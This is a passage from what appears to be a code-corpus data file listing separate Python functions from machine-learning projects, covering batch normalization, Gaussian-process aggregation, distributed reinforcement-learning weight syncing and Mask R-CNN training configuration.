#\n #######################################################################\n \n sample_mean = np.mean(x, axis=0)\n sample_variance = np.var(x, axis=0)\n \n running_mean = momentum * running_mean + (1 - momentum) * sample_mean\n running_var = momentum * running_var + (1 - momentum) * sample_variance\n \n num = x - sample_mean\n denom = np.sqrt(sample_variance + eps)\n \n x_hat = num/denom\n out = gamma*x_hat + beta\n \n cache = (gamma, x_hat, num, denom, eps, sample_variance)\n\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n elif mode == 'test':\n #######################################################################\n # TODO: Implement the test-time forward pass for batch normalization. #\n # Use the running mean and variance to normalize the incoming data, #\n # then scale and shift the normalized data using gamma and beta. #\n # Store the result in the out variable. #\n #######################################################################\n num = x - running_mean\n denom = np.sqrt(running_var + eps)\n \n x_hat = num/denom\n out = gamma*x_hat + beta\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n\n return out, cache", "def CUDA(self):\n\n if helpers.CUDA:\n self.generator.cuda()\n self.discriminator.cuda()\n self.adv_loss.cuda()", "def calculate_macs(self) -> None:\n for name, param in self.module.named_parameters():\n if name == \"weight\":\n # ignore N, C when calculate Mult-Adds in ConvNd\n if \"Conv\" in self.class_name:\n self.macs += int(param.nelement() * prod(self.output_size[2:]))\n else:\n self.macs += param.nelement()\n # RNN modules have inner weights such as weight_ih_l0\n elif \"weight\" in name:\n self.macs += param.nelement()", "def get_nml_probs(x, model, data=None, normalize=True, num_classes=2, query_point_weight=20, dist_weight_thresh=None, \n num_grad_steps=10, lr=0.01, batch_size=32, grad_penalty=None, verbose=False, \n show_plots=False, plotting_2d=False, return_params=False):\n results = []\n data = data or DEFAULT_DATA\n orig_inputs, orig_targets = data\n \n if show_plots and plotting_2d:\n plt.figure()\n plt.title(f\"Original rewards\")\n plot_rewards(model, contours=True)\n plot_dataset(data)\n \n marker_for_class = {\n 0: 'x',\n 1: '*'\n }\n \n model.cuda()\n num_batches = ceil(len(orig_inputs) / batch_size)\n\n # NOTE train on gpu, move back to cpu for eval\n \n for proposed_class in range(num_classes):\n new_model = copy.deepcopy(model)\n new_model.cuda()\n \n # Sample all of the adaptation batches in advance\n optimizer = optim.SGD(new_model.parameters(), lr=lr)\n \n for _ in range(num_grad_steps):\n idxs = np.random.permutation(range(len(orig_inputs)))[:batch_size-1]\n X, y = orig_inputs[idxs], orig_targets[idxs]\n X = torch.Tensor(np.vstack((X, x))).cuda()\n y = torch.Tensor(np.hstack((y, proposed_class))).long().cuda()\n \n logits = new_model(X)\n loss = F.cross_entropy(logits, y, reduction='none')\n \n if dist_weight_thresh:\n weights = np.exp(-np.linalg.norm(x - X.cpu().numpy(), axis=-1) * 2.3 / dist_weight_thresh)\n else:\n weights = np.ones(len(y))\n \n weights[-1] *= query_point_weight * 1. 
/ num_batches\n weights = torch.Tensor(weights).cuda()\n loss = torch.sum(loss * weights) / torch.sum(weights)\n \n loss.backward()\n optimizer.step()\n \n new_model.cpu()\n \n with torch.no_grad():\n x_tensor = torch.Tensor(x[None])\n probs = torch.softmax(new_model(x_tensor), -1)\n results.append(probs[0][proposed_class].item())\n \n if show_plots:\n new_model.to(torch.device(\"cpu\"))\n\n if plotting_2d: \n plt.figure()\n plot_rewards(new_model, contours=True, env = False, title=f\"Finetuning on label {proposed_class}\")\n plot_dataset(data)\n plt.scatter(x[0], x[1], marker=marker_for_class[proposed_class], color='w', s=100)\n \n plt.figure()\n plt.title(f\"Losses for label {proposed_class}\")\n plt.plot(losses)\n \n plt.figure()\n plt.title(f\"x loss for label {proposed_class}\")\n plt.plot(x_losses)\n \n plt.figure()\n plt.title(f\"x probs for label {proposed_class}\")\n plt.plot(x_vals)\n \n model.cpu()\n \n if normalize:\n results = np.array(results) / sum(results)\n else:\n results = np.array(results)\n return results if not return_params else (results, new_model)", "def compute_all(self) -> None:\n self.compute_j_matrix()\n self.compute_outter_distribution()\n self.compute_max_prior()\n self.compute_max_poutter()", "def conv_bn_relu_backward(dout, cache):\n conv_cache, sbn_cache, relu_cache = cache\n da = relu_backward(dout, relu_cache)\n dan, dgamma, dbeta = spatial_batchnorm_backward(da, sbn_cache)\n dx, dw, db = conv_backward_fast(dan, conv_cache)\n return dx, dw, db, dgamma, dbeta", "def reset_ref_batch(self, batch):\n with torch.no_grad():\n self.labels = batch[1]\n self.batch = batch[0]\n _, self.r_act_2, _ = self.inference_net(self.batch.cuda(self.gpu_id))\n\n self.mu2_c0, self.sigma2_c0 = calc_stats(self.r_act_2[self.labels.view(-1) == 0])\n self.mu2_c1, self.sigma2_c1 = calc_stats(self.r_act_2[self.labels.view(-1) == 1])", "def setup_gpu_and_random(config):\n random.seed(config.general.manualSeed)\n np.random.seed(config.general.manualSeed)\n torch.manual_seed(config.general.manualSeed)\n torch.cuda.manual_seed(config.general.manualSeed)\n\n cudnn.benchmark = True\n cudnn.deterministic = True\n config.num_gpu = torch.cuda.device_count()\n\n if config.num_gpu > 1:\n print('------ Use multi-GPU setting ------')\n print('if you stuck too long time with multi-GPU setting, try to set --workers 0')\n # check multi-GPU issue https://github.com/clovaai/deep-text-recognition-benchmark/issues/1\n config.workers = config.workers * config.num_gpu\n config.batch_size = config.batch_size * config.num_gpu\n\n \"\"\" previous version\n print('To equlize batch stats to 1-GPU setting, the batch_size is multiplied with num_gpu and multiplied batch_size is ', opt.batch_size)\n opt.batch_size = opt.batch_size * opt.num_gpu\n print('To equalize the number of epochs to 1-GPU setting, num_iter is divided with num_gpu by default.')\n If you dont care about it, just commnet out these line.)\n opt.num_iter = int(opt.num_iter / opt.num_gpu)\n \"\"\"", "def compute(self) -> Tuple[float, float, float]:\n # @TODO: ddp hotfix, could be done better\n if self._is_ddp:\n for key in self.statistics:\n value: List[float] = all_gather(self.statistics[key])\n value: float = sum(value)\n self.statistics[key] = value\n\n precision_value, recall_value, f1_value = get_binary_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n zero_division=self.zero_division,\n )\n return precision_value, recall_value, f1_value", "def prediction_aggregation(self, xt_s,mu_s,var_s, 
method='PoE', weighting='uniform', power=26):\n\n nt = xt_s.shape[0]\n mu = np.zeros([nt, self.C],dtype='float64')\n var = np.zeros([nt, self.C],dtype='float64')\n\n prior_var = self.experts[0].kernel(xt_s[0], xt_s[0])\n\n \n #Process each latent gp individually \n for j in range(self.C):\n \n mu_s_c = mu_s[:, :, j]\n var_s_c = var_s[:, :, j]\n \n weight_matrix = compute_weights(mu_s_c, var_s_c, power, weighting, prior_var)\n \n prec_s= 1/var_s_c\n\n if method == 'PoE':\n \n prec = tf.reduce_sum(prec_s, axis=0)\n \n\n if method == 'gPoE':\n \n weight_matrix = normalize_weights(weight_matrix)\n\n prec = tf.reduce_sum(weight_matrix * prec_s , axis=0)\n \n\n if method == 'BCM':\n \n prec = tf.reduce_sum(prec_s, axis=0) + (1 - self.M) / prior_var \n\n if method == 'rBCM':\n \n \n prec = tf.reduce_sum(weight_matrix * prec_s, axis=0) \\\n + (1 - tf.reduce_sum(weight_matrix, axis=0)) / prior_var\n \n \n \n if method != 'bar':\n \n var[:, j] = 1 / prec\n\n mu[:, j] = var[:, j] * tf.reduce_sum(weight_matrix * prec_s * mu_s_c, axis=0)\n \n else:\n \n weight_matrix = normalize_weights(weight_matrix)\n\n mu[:, j] = tf.reduce_sum(weight_matrix * mu_s_c, axis=0)\n var[:, j] = tf.reduce_sum(weight_matrix * var_s_c, axis=0)\n \n \n return self.lik_aggregation(mu, var)", "def spatial_batchnorm_forward(x, gamma, beta, bn_param):\n out, cache = None, None\n\n #############################################################################\n # TODO: Implement the forward pass for spatial batch normalization. #\n # #\n # HINT: You can implement spatial batch normalization using the vanilla #\n # version of batch normalization defined above. Your implementation should #\n # be very short; ours is less than five lines. #\n #############################################################################\n pass\n #############################################################################\n # END OF YOUR CODE #\n #############################################################################\n\n return out, cache", "def stats(self):\n remaining_params, total_params = 0, 0 \n for mask, _ in self.masked_parameters:\n remaining_params += mask.detach().cpu().numpy().sum()\n total_params += mask.numel()\n return remaining_params, total_params", "def update_net(optimizer):\n assert kl_train_dataset.bp_mode\n frames_gen, frame_cnt, rel_props, prop_ticks, prop_scaling = kl_train_dataset[index]\n\n optimizer.zero_grad()\n \n num_crop = 1\n length = 3\n if args.modality == 'Flow':\n length = 10\n elif args.modality == 'RGBDiff':\n length = 18\n \n for frames in frames_gen:\n # frames.shape == [frame_batch_size * num_crop * 3, 224, 224]\n assert len(frames) == length * frame_cnt\n input_var = torch.autograd.Variable(frames.view(-1, length, frames.size(-2), frames.size(-1)).cuda())\n base_out = net(input_var, None, None, None, None)\n assert base_out.size(0) == frame_cnt and base_out.size(1) == base_out_dim\n step_features = base_out.mean(dim=0).unsqueeze(0)\n gate, glcu_task_pred = net.glcu(step_features)\n gate = gate.repeat(1, frame_cnt).view(frame_cnt, base_out_dim)\n assert glcu_task_pred.size(0) == 1\n glcu_task_pred = F.softmax(glcu_task_pred.squeeze(), dim=0)\n if net.additive_glcu:\n base_out = base_out + gate\n else:\n base_out = base_out * gate\n\n output = net.test_fc(base_out)\n assert output.size(0) == frame_cnt and output.size(1) == output_dim\n act_scores, comp_scores, reg_scores = reorg_stpp.forward(output, prop_ticks, prop_scaling, bp_mode=True)\n\n # Task Head\n combined_scores = F.softmax(act_scores[:, 1:], 
dim=1) * torch.exp(comp_scores)\n combined_scores = combined_scores.mean(dim=0).unsqueeze(0)\n task_pred = net.task_head(combined_scores)\n assert task_pred.size(0) == 1\n task_pred = F.softmax(net.task_head(combined_scores).squeeze(), dim=0)\n\n loss = KL(task_pred, glcu_task_pred)\n loss.backward()\n torch.cuda.empty_cache() # To empty the cache from previous iterations\n break\n\n optimizer.step()\n optimizer.zero_grad()\n torch.cuda.empty_cache()\n\n return float(loss.data), frame_cnt", "def syn_ucbpe(num_workers, gp, acq_optimiser, anc_data):\n # Define some internal functions.\n beta_th = _get_ucb_beta_th(gp.input_dim, anc_data.t)\n # 1. An LCB for the function\n def _ucbpe_lcb(x):\n \"\"\" An LCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu - beta_th * sigma\n # 2. A modified UCB for the function using hallucinated observations\n def _ucbpe_2ucb(x):\n \"\"\" An LCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu + 2 * beta_th * sigma\n # 3. UCB-PE acquisition for the 2nd point in the batch and so on.\n def _ucbpe_acq(x, yt_dot, halluc_pts):\n \"\"\" Acquisition for GP-UCB-PE. \"\"\"\n _, halluc_stds = gp.eval_with_hallucinated_observations(x, halluc_pts,\n uncert_form='std')\n return (_ucbpe_2ucb(x) > yt_dot).astype(np.double) * halluc_stds\n\n # Now the algorithm\n yt_dot_arg = _optimise_acquisition(_ucbpe_lcb, acq_optimiser, anc_data)\n yt_dot = _ucbpe_lcb(yt_dot_arg.reshape((-1, gp.input_dim)))\n recommendations = [asy_ucb(gp, acq_optimiser, anc_data)]\n for _ in range(1, num_workers):\n curr_acq = lambda x: _ucbpe_acq(x, yt_dot, np.array(recommendations))\n new_rec = _optimise_acquisition(curr_acq, acq_optimiser, anc_data)\n recommendations.append(new_rec)\n return recommendations", "def _shared_params(self):\n return BenchmarkBase._shared_params(self)._replace(\n num_gpus=1, model='resnet50', distortions=False, forward_only=True)", "def main(args):\n gt_path = args.ground_truth\n djdd_path = args.djdd\n bjdd_path = args.bjdd\n\n mse_fn = th.nn.MSELoss()\n psnr_fn = PSNR()\n\n device = \"cpu\"\n # if th.cuda.is_available():\n # device = \"cuda\"\n\n pdf = pd.DataFrame(columns=[\"filename\",\"imgid\", \"PSNR_for_DJDD\", \"MSE_for_DJDD\", \"PSNR_for_BJDD\", \"MSE_for_BJDD\"])\n\n count = 0\n msedjdd = 0.0\n psnrdjdd = 0.0\n\n msebjdd = 0.0\n psnrbjdd = 0.0\n\n for root, _, files in os.walk(gt_path):\n for idx, name in enumerate(files):\n \n # djdd image\n output_djdd = np.array(imread(os.path.join(djdd_path, name+\"_0_output.png\"))).astype(np.float32) / (2**8-1)\n output_djdd = th.from_numpy(np.transpose(output_djdd, [2,0,1])).to(device).unsqueeze(0)\n\n #bjdd image\n output_bjdd = np.array(imread(os.path.join(bjdd_path, name.split('.')[0]+\"_sigma_0_bayer_PIPNet.png\"))).astype(np.float32) / (2**8-1)\n output_bjdd = th.from_numpy(np.transpose(output_bjdd, [2,0,1])).to(device).unsqueeze(0)\n\n # gt image\n target = np.array(imread(os.path.join(root, name))).astype(np.float32) / (2**8-1)\n target = th.from_numpy(np.transpose(target, [2, 0, 1])).to(device).unsqueeze(0)\n\n\n target_djdd = crop_like(target, output_djdd)\n target_bjdd = crop_like(target, output_bjdd)\n\n psnr_djdd = psnr_fn(output_djdd, target_djdd).item()\n mse_djdd = mse_fn(output_djdd, target_djdd).item()\n\n psnr_bjdd = psnr_fn(output_bjdd, target_bjdd).item()\n mse_bjdd = mse_fn(output_bjdd, target_bjdd).item()\n\n psnrdjdd += psnr_djdd\n msedjdd += mse_djdd\n psnrbjdd += psnr_bjdd\n msebjdd += mse_bjdd\n\n count += 1\n\n LOG.info(f\"imgid: {idx}, 
PSNR_BJDD: {psnr_bjdd}, MSE_BJDD: {mse_bjdd}, PSNR_DJDD: {psnr_djdd}, MSE_DJDD: {mse_djdd}\")\n pdf = pdf.append({\n \"filename\": name,\n \"imgid\": idx,\n \"PSNR_for_DJDD\": psnr_djdd,\n \"MSE_for_DJDD\": mse_djdd,\n \"PSNR_for_BJDD\": psnr_bjdd,\n \"MSE_for_BJDD\": mse_bjdd\n }, ignore_index=True)\n # pdb.set_trace()\n\n msebjdd /= count\n psnrbjdd /= count\n\n msedjdd /= count\n psnrdjdd /= count\n\n LOG.info(\"--------------BJDD---------------------\")\n LOG.info(\"Average, PSNR = %.1f dB, MSE = %.5f\", psnrbjdd, msebjdd)\n\n LOG.info(\"--------------DJDD---------------------\")\n LOG.info(\"Average, PSNR = %.1f dB, MSE = %.5f\", psnrdjdd, msedjdd)\n pdb.set_trace()\n pdf.to_csv(\"/workspace/presentation_compare.csv\")", "def update_network(self):\n\n device = torch.device(\"cpu\")\n self.model = ProLoNet(input_dim=13,\n weights=None,\n comparators=None,\n leaves=32,\n output_dim=1,\n bayesian_embedding_dim=8,\n alpha=1.5,\n use_gpu=False,\n vectorized=True,\n is_value=True).to(device)\n\n self.embedding_optimizer = torch.optim.RMSprop([{'params': self.model.bayesian_embedding.parameters()}], lr=.1)\n self.embedding_list = [torch.ones(3) * 1 / 3 for i in range(2000)]\n self.opt = torch.optim.RMSprop(\n [{'params': list(self.model.parameters())[:-1]}, {'params': self.model.bayesian_embedding.parameters(), 'lr': .01}], lr=.01)\n\n criterion = torch.nn.BCELoss()\n\n n_epochs = 4000 + self.global_schedule_num * 3\n for epoch in range(n_epochs):\n which_schedule = np.random.randint(len(self.data_so_far))\n timestep_within_schedule = np.random.randint(len(self.teacher_actions[which_schedule]))\n\n index_within_network_state = timestep_within_schedule * 20\n timestep_data_from_agg = self.data_so_far[which_schedule][index_within_network_state:index_within_network_state+20]\n task = self.teacher_actions[which_schedule][timestep_within_schedule]\n # set the embedding\n self.model.set_bayesian_embedding(self.embedding_list[which_schedule].clone())\n # update loop\n\n phi_i_num = task\n phi_i = self.get_features_from_timestep_data_from_agg(timestep_data_from_agg, phi_i_num)\n phi_i_numpy = np.asarray(phi_i)\n loss_counter = 0\n # iterate over pairwise comparisons\n for counter in range(0, 0 + 20):\n if counter == phi_i_num:\n continue\n else:\n phi_j = self.get_features_from_timestep_data_from_agg(timestep_data_from_agg, counter)\n phi_j_numpy = np.asarray(phi_j)\n feature_input = phi_i_numpy - phi_j_numpy\n\n if self.use_gpu:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)).cuda())\n label = Variable(torch.Tensor(torch.ones((1, 1))).cuda())\n else:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)))\n label = Variable(torch.Tensor(torch.ones((1, 1))))\n sig = torch.nn.Sigmoid()\n output = sig(self.model(feature_input))\n loss = criterion(output, label)\n # prepare optimizer, compute gradient, update params\n loss_counter += loss.item()\n self.opt.zero_grad()\n loss.backward()\n # torch.nn.utils.clip_grad_norm_(self.model.parameters(), 0.5)\n self.opt.step()\n\n for counter in range(0, 0 + 20):\n if counter == phi_i_num:\n continue\n else:\n phi_j = self.get_features_from_timestep_data_from_agg(timestep_data_from_agg, counter)\n phi_j_numpy = np.asarray(phi_j)\n feature_input = phi_j_numpy - phi_i_numpy\n\n if self.use_gpu:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)).cuda())\n label = Variable(torch.Tensor(torch.zeros((1, 1))).cuda())\n else:\n feature_input = Variable(torch.Tensor(feature_input.reshape(1, 13)))\n label = 
Variable(torch.Tensor(torch.zeros((1, 1))))\n sig = torch.nn.Sigmoid()\n output = sig(self.model.forward(feature_input))\n\n self.opt.zero_grad()\n loss = criterion(output, label)\n loss_counter += loss.item()\n\n loss.backward()\n # torch.nn.utils.clip_grad_norm_(self.model.parameters(), 0.5)\n self.opt.step()\n self.loss_array.append(loss_counter / 38)\n self.embedding_list[which_schedule] = torch.Tensor(self.model.get_bayesian_embedding().detach().cpu().numpy()).clone() # very ugly", "def rnn_cell_loop(self):\n\n\t\t# Set up initial state\n\t\tself.h_out = [tf.zeros([par['batch_size'],par['n_hidden']])]\t\t\t# Spike\n\t\tself.h = tf.ones([par['batch_size'],par['n_hidden']])\t\t\t\t\t# State\n\t\tself.h *= 0.1 if par['cell_type'] == 'rate' else par[par['cell_type']]['V_r']\n\t\tself.h = [self.h]\n\t\tadapt = par['w_init']*tf.ones([par['batch_size'],par['n_hidden']])\n\n\t\tsyn_x = par['syn_x_init']*tf.ones([par['batch_size'], par['n_hidden']]) if par['use_stp'] else None\n\t\tsyn_u = par['syn_u_init']*tf.ones([par['batch_size'], par['n_hidden']]) if par['use_stp'] else None\n\n\t\t# Apply the EI mask to the recurrent weights\n\t\tself.W_rnn_effective = par['EI_matrix'] @ tf.nn.relu(self.var_dict['W_rnn'])\n\n\t\t# Set up latency buffer if being used\n\t\tif par['use_latency']:\n\t\t\tself.state_buffer = [tf.zeros([par['batch_size'], par['n_hidden']]) for t in range(par['latency_max'])]\n\t\t\tself.state_buffer = deque(self.state_buffer)\n\t\t\tself.W_rnn_latency = self.W_rnn_effective[tf.newaxis,...] * par['latency_mask']\n\t\t\tself.lat_spike_shape = tf.ones([par['latency_max'], 1, 1])\n\n\t\t# Set up output record\n\t\tself.output = []\n\t\tself.syn_x = []\n\t\tself.syn_u = []\n\n\t\ty = 0.\n\t\tfor t in range(par['num_time_steps']):\n\t\t\tself.t = t \t\t# For latency calculations\n\n\t\t\tif par['cell_type'] == 'rate':\n\t\t\t\traise Exception('Rate cell not yet implemented.')\n\t\t\telif par['cell_type'] == 'adex':\n\t\t\t\tif t < 10:\n\t\t\t\t\tspike, state, adapt, syn_x, syn_u = self.AdEx_cell(tf.zeros_like(self.h_out[-1]), self.h[-1], \\\n\t\t\t\t\t\tadapt, self.input_data[t], syn_x, syn_u)\n\t\t\t\telse:\n\t\t\t\t\tspike, state, adapt, syn_x, syn_u = self.AdEx_cell(self.h_out[-10], self.h[-1], \\\n\t\t\t\t\t\tadapt, self.input_data[t], syn_x, syn_u)\n\t\t\t\ty = 0.95*y + 0.05*(spike @ self.var_dict['W_out'] + self.var_dict['b_out'])\n\n\t\t\t\tself.h_out.append(spike)\n\t\t\t\tself.h.append(state)\n\t\t\t\tself.output.append(y)\n\t\t\t\tself.syn_x.append(syn_x)\n\t\t\t\tself.syn_u.append(syn_u)\n\n\t\t\telif par['cell_type'] == 'lif':\n\t\t\t\tspike, state, adapt, syn_x, syn_u = self.LIF_cell(self.h_out[-1], self.h[-1], adapt, self.input_data[t], syn_x, syn_u)\n\t\t\t\ty = 0.95*y + 0.05*spike @ self.var_dict['W_out'] + 0.*self.var_dict['b_out']\n\n\t\t\t\tself.h_out.append(spike)\n\t\t\t\tself.h.append(state)\n\t\t\t\tself.output.append(y)\n\n\t\t# Stack records\n\t\tself.output = tf.stack(self.output, axis=0)\n\t\tself.h = tf.stack(self.h, axis=0)\n\t\tself.h_out = tf.stack(self.h_out, axis=0)\n\t\tself.syn_x = tf.stack(self.syn_x, axis=0)\n\t\tself.syn_u = tf.stack(self.syn_u, axis=0)", "def compute_status(self, net_output, gts):\n # setting prob_list and probs as None\n self.probs = None\n self.prob_list = None\n\n logit_list = net_output[0]\n self.compute_top1_accuracy(logit_list, gts)\n self.compute_oracle_accuracy(logit_list, gts)\n self.compute_confusion_matrix(logit_list, gts)\n\n self.attach_predictions()\n self.attach_assignments(gts)", "def process(self, sess):\n 
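        # One update step for this worker, as implemented below: pull a rollout from the
        # queue, convert it to a training batch with process_rollout (gamma=0.99,
        # lambda_=1.0), and run train_op (writing a summary every 11 local steps on
        # task 0). With more than one worker, every 100 local steps the change in the
        # local weights is pickled and multicast to peers, and any weight diffs received
        # on inc_msg_q are added onto the local network variables.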
global send_counter\n \n #sess.run(self.sync) # copy weights from shared to local\n rollout = self.pull_batch_from_queue()\n batch = process_rollout(rollout, gamma=0.99, lambda_=1.0)\n\n should_compute_summary = self.task == 0 and self.local_steps % 11 == 0\n\n if should_compute_summary:\n fetches = [self.summary_op, self.train_op]\n else:\n fetches = [self.train_op]\n\n\n feed_dict = {\n self.local_network.x: batch.si,\n self.ac: batch.a,\n self.adv: batch.adv,\n self.r: batch.r,\n self.local_network.state_in[0]: batch.features[0],\n self.local_network.state_in[1]: batch.features[1],\n }\n\n # Get current trainable variables\n # This is trainable variables\n fetched = sess.run(fetches, feed_dict=feed_dict)\n\n\n if self.num_workers > 1:\n sys.stdout.write('\\r' + str(self.local_steps))\n if self.local_steps % 100 == 0:\n global var0\n global var1\n var1 = sess.run(self.local_network.var_list) # After training\n if var0 != None:\n var_diff = [a - b for (a,b) in zip(var1, var0)]\n var_diff_data = pickle.dumps(var_diff, -1)\n print('Sync weights')\n self.msg_sent = socket_util.socket_send_data_chucks(self.sock, var_diff_data, self.mcast_destination, self.msg_sent)\n var0 = sess.run(self.local_network.var_list) # A list of numpy array\n\n # Handle each message in the socket queue\n while not self.inc_msg_q.empty():\n print('Apply remote gradients')\n # Process received grads_and_vars from other peers\n remote_var_diff_data = self.inc_msg_q.get(False)\n remote_var_diff = pickle.loads(remote_var_diff_data)\n\n add_op = [a+b for (a,b) in zip(self.local_network.var_list, remote_var_diff)]\n sess.run(add_op)\n\n if should_compute_summary:\n self.summary_writer.add_summary(tf.Summary.FromString(fetched[0]))\n self.summary_writer.flush()\n self.local_steps += 1", "def __call__(self, initial_state, previous_alignments):\n with tf.variable_scope(None, \"rnn_score_attention\", [initial_state]):\n score, final_state = rnn_score(initial_state, self._keys, self._cell, self._memory_sequence_length)\n alignments = self._probability_fn(score, previous_alignments)\n return alignments, final_state", "def main(Args):\n norm = [1.9844158727667542, 413.83759806375525,\n 51.2789974336363, 1038.4760551905683]\n input_pull = False\n input_model_mapping = False\n max_number = 2\n count = 40000\n catalog_name = os.path.join(DATA_PATH, 'OneDegSq.fits')\n # Define parameters for mrcnn model with btk here\n resid_model = btk_utils.Resid_btk_model(\n Args.model_name, Args.model_path, MODEL_DIR, training=True,\n images_per_gpu=4, validation_for_training=True)\n # Load parameters for dataset and load model\n resid_model.config.WEIGHT_DECAY = 0.001\n resid_model.config.STEPS_PER_EPOCH = 1000\n resid_model.config.VALIDATION_STEPS = 20\n sampling_function = None\n layers = 'all'\n if Args.model_name == 'model1':\n resid_model.config.BACKBONE = 'resnet41'\n elif Args.model_name == 'model2':\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n elif Args.model_name == 'model3':\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n elif Args.model_name == 'model4':\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 
64)\n elif Args.model_name == 'model5':\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet35'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n elif Args.model_name == 'model4_large':\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = '4+' # '3+'\n elif Args.model_name == 'model6':\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 51.2789974336363, 1038.4760551905683]\n input_pull = True\n elif Args.model_name == 'model7':\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model8': # stretch = 0.1, Q = 3\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model9': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1., 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_again': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] 
# [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_again2': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = None\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_again3': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0, 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model10_2': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 'resnet41'\n resid_model.config.SKIP_P2_RPN = True\n resid_model.config.BACKBONE_STRIDES = [8, 16, 32, 64]\n resid_model.config.RPN_ANCHOR_SCALES = (8, 16, 32, 64)\n sampling_function = btk_utils.resid_general_sampling_function_large\n layers = 'all'\n norm = [0., 1.45, 0., 1.] # [0, 1, 0, 1]\n input_pull = True\n input_model_mapping = True\n elif Args.model_name == 'model11': # stretch = 2000, Q = 0.5\n resid_model.config.TRAIN_BN = False\n resid_model.config.BACKBONE = 